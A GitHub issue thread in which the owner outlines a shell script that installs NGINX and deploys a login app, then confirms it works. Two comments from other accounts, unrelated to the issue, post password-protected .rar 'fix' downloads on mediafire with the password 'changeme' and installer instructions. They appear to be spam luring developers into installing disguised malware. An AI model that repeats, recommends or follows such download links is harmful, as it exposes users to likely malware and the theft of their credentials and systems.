### ISSUE TITLE
Design web application deployment script, for Jenkins in future.

### ISSUE THREAD

**Issue by gr1817** [gr1817/login-1718#2]
1. Create a shell script with following specification within Devops branch
2. Update the system.
3. Install following list of utilities sever : zip or unzip.
4. Install HTTP server i.e NGINX WEB SERVER.
5. Remove sample test pages from Web server i.e /var/www/html/.
6. login app repository i.e github url.
7. Create Login App to NGINX server document root i.e /var/www/html/.
8. Verify server is loading login app

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gr1817** [comment]
Server is loading login app
